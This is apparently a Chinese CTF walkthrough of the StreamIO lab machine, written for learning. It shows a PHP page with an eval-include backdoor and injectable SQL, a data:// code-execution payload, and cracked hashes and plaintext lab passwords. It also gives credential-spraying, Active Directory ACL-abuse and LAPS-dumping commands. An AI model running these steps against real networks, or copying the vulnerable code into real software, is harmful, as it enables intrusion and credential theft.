				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>

注意看最下面这部分php代码：

<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>

假设我们传入的include参数是data://text/plain,phpinfo();，那么经过file_get_contents()函数的处理再传给eval函数，不就直接执行了phpinfo()了吗？我们试一下：

果不其然，出现了phpinfo。那接下来更改phpinfo();为system('command')即可执行任意命令。我这里是上传了一个webshell，然后利用蚁剑连接。当前用户是yoshihide且没有家目录，仅用于Web应用操作。之后审计了一下代码，得到了两对mssql的账号密码：

#C:/inetpub/streamio.htb/admin/index.php
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');

#C:/inetpub/watch.streamio.htb/search.php
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');

利用蚁剑的数据操作的功能，可以直接连接到mssql（也可以实验sqlcmd连接，执行where.exe sqlcmd即可找到sqlcmd的位置），查看streamio_backup表中的数据：

可以看到有一条username为nikk37的数据，利用蚁剑的导出功能导出结果，得到了一个csv文件：

$ cat 10.10.11.158_20231210123309.csv 
id,username,password
8,Sabrina,f87d3c0d6c8fd686aacc6627f1f493a5
7,William,d62be0dc82071bccc1322d64ec5b6c51
6,Lauren,08344b85b329d7efd611b7a7743e8a09
5,Samantha,083ffae904143c4796e464dac33c1f7d
4,Theodore,925e5408ecb67aea449373d668b7359e
3,James,c660060492d9edcaa8332d89c99c9239
2,yoshihide,b779ba15cedfd22a023c4d8bcf5f2332
1,nikk37,389d14cb8e4e9b94b137deb1caf0612a

依然对数据进行处理，并爆破密码，结果如下：

# hashcat account /usr/share/wordlists/rockyou.txt --username -m 0 --show 
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com

尝试利用evil-winrm和nikk37:get_dem_girls2@yahoo.com进行登录，成功登录：

GetAdministrator

首先上传一个SharpHound.exe进行信息收集：

接着下载生成的zip文件并导入到BloodHound：

图中所指的用户为jdgodd，所指的组为core staff。可以看到jdgodd对core staff有writeowner的权限，而core staff的组成员可以读取LAPS的密码。我们可以看到core staff组中是没有成员的：

因此我们此时的思路是拿到jdgodd的密码然后登录到DC，之后将jdgodd或者nikk37添加到core staff组中，最后dump LAPS密码。那首先进行我们的第一步，找到jdgodd密码。上传一个Winpeas运行一下，看看能不能找到线索：

可以看到，这台电脑安装了firefox且找到了firefox的凭据文件，可以利用HackBrowserData把密码dump出来：

下载下来并解压后，就可以看到密码了：

$ cat results/firefox_br53rxeg_default_release_password.json 
[
  {
    "UserName": "JDgodd",
    "Password": "password@12",
    "LoginURL": "",
    "CreateDate": "2022-02-22T02:41:51-08:00"
  },
  {
    "UserName": "yoshihide",
    "Password": "paddpadd@12",
    "LoginURL": "",
    "CreateDate": "2022-02-22T02:41:24-08:00"
  },
  {
    "UserName": "nikk37",
    "Password": "n1kk1sd0p3t00:)",
    "LoginURL": "",
    "CreateDate": "2022-02-22T02:41:10-08:00"
  },
  {
    "UserName": "admin",
    "Password": "JDg0dd1s@d0p3cr3@t0r",
    "LoginURL": "",
    "CreateDate": "2022-02-22T02:40:56-08:00"
  }
]

但是直接利用JDgodd:password@12无法认证成功，似乎还需要我们重新爆破一下。整理一下账号密码：

利用cme爆破一下：

# crackmapexec smb 10.10.11.158 -u user1 -p pass1 --continue-on-success
SMB         10.10.11.158    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [-] streamIO.htb\JDgodd:password@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\JDgodd:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:password@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:password@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\admin:password@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\admin:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\admin:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE

得到账号密码：streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r，但是得到了这组账号密码我们仍然无法利用evil-winrm成功登录。用cme的爆破一下：

# crackmapexec winrm 10.10.11.158 -u user1 -p pass1 --continue-on-success
SMB         10.10.11.158    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:streamIO.htb)
HTTP        10.10.11.158    5985   DC               [*] http://10.10.11.158:5985/wsman
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\JDgodd:password@12
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\JDgodd:paddpadd@12
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:)
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\yoshihide:password@12
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\yoshihide:paddpadd@12
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:)
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\nikk37:password@12
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\nikk37:paddpadd@12
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\nikk37:n1kk1sd0p3t00:)
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\nikk37:JDg0dd1s@d0p3cr3@t0r
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\admin:password@12
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\admin:paddpadd@12
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\admin:n1kk1sd0p3t00:)
WINRM       10.10.11.158    5985   DC               [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r

不难发现，JDgodd这个账户我们没法远程登录。那利用bloodhound-python远程收集一波信息吧：

# bloodhound-python -d streamio.htb -u JDgodd -p "JDg0dd1s@d0p3cr3@t0r"  -c All  -ns 10.10.11.158 -dc streamio.htb --zip 
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 20S
INFO: Compressing output into 20231210133117_bloodhound.zip

导入到BloodHound中，可以找到解决办法：

BloodHound告诉我们可以使用PowerView中的Add-DomainObjectAcl函数来向core staff组中添加成员。接下来我们登录到nikk37，上传powerview并导入：

1 2	upload ../../../../../home/rainb0w/Tools/PowerSploit/Recon/PowerView.ps1 . . .\PowerView.ps1

存储凭据：

1 2	$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('streamIO.htb\JDgodd', $SecPassword)

通过Add-DomainObjectAcl赋予所有的权力，并通过Add-DomainGroupMember添加nikk37到CORE STAFF组中：

1 2	Add-DomainObjectAcl -Credential $Cred -TargetIdentity "CORE STAFF" -Rights All -PrincipalIdentity JDgodd Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'nikk37' -Cred $Cred

接下来可以利用这篇文章：https://www.hackingarticles.in/credential-dumpinglaps/ 中介绍的方法去dump laps凭据：

1
2
3

crackmapexec ldap 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com' –kdcHost 10.10.11.158 -M laps

ldapsearch -x -H ldap://10.10.11.158 -D nikk37@streamio.htb -w "get_dem_girls2@yahoo.com" -b "dc=streamio,dc=htb" "(ms-MCs-admpwd=*)"|grep ms-Mcs-AdmPwd

最后利用得到的密码登录到Administrator，拿到Root Flag：

总结

这道靶机并不困难，只是考点比较多，因此打起来也感到比较繁琐费力，因此个人认为还是值得Medium难度。